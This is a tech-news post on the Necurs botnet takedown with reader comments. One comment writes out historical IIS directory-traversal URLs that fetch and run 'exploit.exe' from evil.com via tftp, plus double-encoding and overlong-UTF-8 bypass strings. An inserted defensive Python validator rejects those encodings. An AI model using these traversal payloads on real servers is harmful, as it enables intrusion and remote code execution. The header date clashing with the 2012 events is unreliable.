date 2011-03-20
from the in-search-of-electronic-"brains!" dept.
Microsoft takes down millions of zombie bots:
Microsoft has said it was part of a team that dismantled an international network of zombie bots.
The network called Necurs infected over nine million computers and is one of the world's largest botnets.
Necurs was responsible for multiple criminal scams including stealing personal information and sending fake pharmaceutical emails.
[...] Tom Burt, Microsoft's vice-president for customer security and trust, said in a blog post that the takedown of Necurs was the result of eight years of planning and co-ordination with partners in 35 countries.
He wrote that the steps taken will "ensure the criminals behind this network are no longer able to use key elements of its infrastructure to execute cyber-attacks."
[...] Necurs first appeared in 2012.
It is believed to have had a network of more than nine million zombie computers.
To grow this network Necurs used a domain generation algorithm that created random domain names the group turned into websites. It used these sites to send instructions to its army of infected computers.
Microsoft and its partners were able to crack Necurs' algorithm and predict what domain names it would be using in the months ahead and block them.
(Score: 0) by Anonymous Coward on Wednesday March 11, @02:46PM
Did MS push an update to their Win10 that brought them all down?
(Score: 2) by Runaway1956 on Wednesday March 11, @03:12PM (2 children)
Next up, you'll be declared a criminal for not upgrading to Win15, or whatever. If MS were truly interested in security, they would have baked security in, before they ever had a working OS. Kinda like *nix-like OS's.
Privacy policy: I only track people who have great buns. No, I'm not following any of you lard asses, so stop worrying
(Score: 3, Interesting) by DannyB on Wednesday March 11, @03:46PM
In Windows 95 Microsoft added, for the first time, an optional (laughable) login screen.
IIS runs (or once did run) effectively in kernel -- in an attempt to have the efficiency of Apache, without regard for security implications.
Self-executing email viruses were a fun joke in the Usenet days. Microsoft made that joke into reality.
IIS mapped some path, I think it was like C:\inetpub\wwwroot as the root of web pages it served up. But, for no extra cost, they made it possible for a suitably crafted URL to crawl back up the pathname and into other areas of the filesystem.
http://some-stupid-iis-server.com/../../windows/system32/cmd.exe?/c+tftp.exe+evil.com/exploit.exe
http://some-stupid-iis-server.com/../../windows/system32/cmd.exe?/c+exploit.exe
(or something like that)
I remember demonstrating that to a coworker in 1999, on a newly installed, fully patched Windows NT 4.0 running IIS. Later you had to use some incantation like scripts/..%c0%af../winnt/. Later you couldn't use the dot-dot to walk back up the directory path. You had to replace each dot with %2E and each slash with %2F. So Microsoft fixed that, but you could then replace
%2E with %25%32%45 (e.g., url-encode the percent, then the "2", then the "E")
%2F with %25%32%46
(this worked because IIS didn't see anything wrong, so it obeyed the first level of url-encode, then the Windows File System obeyed the 2nd level of url-encode!)
My what a security minded design they had. How about not running the web server in kernel, and not as root, and chrooting it to prevent any kind of escape mechanism out of the set of static web content that should be served?
Reminder: March is national procrastination week!
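Added example, not part of the comment above and not Microsoft's or IIS's code: a Python sketch of the check that the encodings described there slipped past, which decodes a request path exactly once, refuses anything a second decode would still change, rejects overlong UTF-8, and only then confines the result to the document root. The names `WEB_ROOT`, `RejectedPath`, `resolve_request_path` and `verdict` are hypothetical, and the sample request paths are constructed from the encodings named in the comment.

```python
import posixpath
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/inetpub/wwwroot"  # assumed document root, mirrors the path in the comment

class RejectedPath(ValueError):
    """Raised when a request path must not be served."""

def resolve_request_path(raw_path: str, root: str = WEB_ROOT) -> str:
    """Percent-decode exactly once, then confine the result to root."""
    decoded = unquote_to_bytes(raw_path)
    # If a second pass would still change the bytes, the request carried nested
    # escapes (%25%32%45 -> %2E -> "."). Refuse it instead of letting a later
    # layer decode again. Trade-off: names holding a literal "%XX" are refused too.
    if unquote_to_bytes(decoded) != decoded:
        raise RejectedPath("nested percent-encoding")
    try:
        # Strict UTF-8 rejects overlong forms such as C0 AF, an alias for "/".
        text = decoded.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        raise RejectedPath("invalid or overlong UTF-8") from None
    if "\x00" in text:
        raise RejectedPath("NUL byte")
    # Treat "\" as a separator too, then resolve "." and ".." before checking.
    relative = text.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        raise RejectedPath("escapes document root")
    return candidate

def verdict(raw_path: str) -> str:
    """Return the served path, or 'rejected: <reason>'."""
    try:
        return resolve_request_path(raw_path)
    except RejectedPath as exc:
        return f"rejected: {exc}"

if __name__ == "__main__":
    # Constructed request paths modelled on the encodings named in the comment.
    for sample in (
        "/index.html",
        "/../../windows/system32/cmd.exe",
        "/scripts/..%c0%af../winnt/",
        "/%2E%2E%2F%2E%2E%2Fwindows/system32/cmd.exe",
        "/%25%32%45%25%32%45%25%32%46windows/system32/cmd.exe",
    ):
        print(f"{sample!r:60} -> {verdict(sample)}")
```

The containment test runs on the fully normalised path, so the order matters: decode, validate the encoding, normalise, and only then compare against the root.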
(Score: 2) by DannyB on Wednesday March 11, @03:48PM
As for Windows 15, I think they've said it will forever be Windows 10 going forward.
Just as Macintosh is OS X forever and ever.
Reminder: March is national procrastination week!
(Score: 1) by Kitsune008 on Wednesday March 11, @03:14PM
So, Microsoft took 9 million PC's running Windows offline.
Bully for them. /sarcasm
They should clean up their mess.